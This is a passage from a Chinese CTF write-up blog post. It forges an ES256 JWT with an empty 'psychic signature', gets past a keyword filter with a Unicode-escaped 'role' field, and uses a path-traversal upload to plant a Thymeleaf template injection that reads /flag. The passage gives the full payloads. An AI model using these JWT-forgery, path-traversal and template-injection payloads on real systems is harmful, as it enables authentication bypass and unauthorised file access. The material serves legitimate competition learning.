<figure class="highlight basic"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs basic"><span class="hljs-symbol">30 </span><span class="hljs-number">06</span> <span class="hljs-number">02</span> <span class="hljs-number">01</span> <span class="hljs-number">00</span> <span class="hljs-number">02</span> <span class="hljs-number">01</span> <span class="hljs-number">00</span><br></code></pre></td></tr></table></figure>

<p>base64url 编码后就是：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">MAYCAQACAQA</span><br></code></pre></td></tr></table></figure>

<p>所以 JWT 的第三段可以直接写死为：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">MAYCAQACAQA</span><br></code></pre></td></tr></table></figure>

<p>这就是所谓的 psychic signature &#x2F; ECDSA 空签名绕过。</p>
<h4 id="构造过程"><a href="#构造过程" class="headerlink" title="构造过程"></a>构造过程</h4><p>header：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;alg&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;ES256&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;typ&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;JWT&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>base64url 编码后：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9<br></code></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nix">&#123;<span class="hljs-string">&quot;phone&quot;</span>:<span class="hljs-string">&quot;admin&quot;</span>,<span class="hljs-string">&quot;rol<span class="hljs-char escape_">\u</span>0065&quot;</span>:<span class="hljs-string">&quot;admin&quot;</span>,<span class="hljs-string">&quot;sid&quot;</span>:<span class="hljs-string">&quot;exp&quot;</span>&#125;<br></code></pre></td></tr></table></figure>

<p>base64url 编码后：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">eyJwaG9uZSI6ImFkbWluIiwicm9sXHUwMDY1IjoiYWRtaW4iLCJzaWQiOiJleHAifQ<br></code></pre></td></tr></table></figure>

<p>signature：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">MAYCAQACAQA</span><br></code></pre></td></tr></table></figure>

<p>拼起来：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9<span class="hljs-selector-class">.eyJwaG9uZSI6ImFkbWluIiwicm9sXHUwMDY1IjoiYWRtaW4iLCJzaWQiOiJleHAifQ</span>.MAYC<br></code></pre></td></tr></table></figure>

<h4 id="思考：为什么不能直接写role"><a href="#思考：为什么不能直接写role" class="headerlink" title="思考：为什么不能直接写role"></a>思考：为什么不能直接写role</h4><p>如果直接构造 payload：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;phone&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;admin&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;role&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;admin&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;sid&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;exp&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>服务端会返回：</p>
<figure class="highlight basic"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs basic"><span class="hljs-symbol">403 </span>无权访问<br></code></pre></td></tr></table></figure>

<p>原因是它在 JWT 解析前做了一个很粗糙的字符串过滤，检测到了 payload 里有字面量 <code>role</code> 或类似 admin 权限字段，于是拦截。</p>
<p>但是 JSON 支持 Unicode 转义。字段名：</p>
<figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nix"><span class="hljs-string">&quot;rol<span class="hljs-char escape_">\u</span>0065&quot;</span><br></code></pre></td></tr></table></figure>

<p>解析之后等价于：</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs 1c"><span class="hljs-string">&quot;role&quot;</span><br></code></pre></td></tr></table></figure>



<p>通过伪造的jwt我们去访问&#x2F;api&#x2F;user&#x2F;profile就得到了admin的密码<code>Sanjiu1234567890@@@</code></p>
<p>进入后台，有文件上传的接口且文件名和文件内容可控，存在路径穿越漏洞</p>
<p>之前响应包带有spring风格，这里推测是 Thymeleaf 模版</p>
<p>上传文件名写成：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">..<span class="hljs-regexp">/templates/</span>orders.html<br></code></pre></td></tr></table></figure>

<p>内容写 Thymeleaf 表达式读取 <code>/flag</code>：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">html</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">html</span> <span class="hljs-attr">xmlns:th</span>=<span class="hljs-string">&quot;http://www.thymeleaf.org&quot;</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">div</span> <span class="hljs-attr">th:text</span>=<span class="hljs-string">&quot;$&#123;new java.io.BufferedReader(new java.io.FileReader(&#x27;/flag&#x27;)).readLine()&#125;&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260701113709190.png" srcset="/img/loading.gif" lazyload alt="image-20260701113709190"></p>
<p>访问订单管理页就能得到flag</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260701113759419.png" srcset="/img/loading.gif" lazyload alt="image-20260701113759419"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>第四届黄河流域公安院校网络安全技能挑战赛</div>
      <div>https://www.sunynov.top/2026/06/10/第四届黄河流域公安院校网络安全技能挑战赛/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suny</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年6月10日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/06/13/PolarCTF2026%E5%A4%8F%E5%AD%A3%E8%B5%9B/" title="PolarCTF2026夏季赛">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">PolarCTF2026夏季赛</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/05/24/LitCTF2026/" title="LitCTF2026 web方向wp">
                        <span class="hidden-mobile">LitCTF2026 web方向wp</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"sg2xM2g9UCt39D62pmfzcl8b-gzGzoHsz","appKey":"ludHhVlixZUIrJv11t6rmegp","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://icp.gov.moe/?keyword=20250279" target="_blank">萌ICP备20250279号</a> <br> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
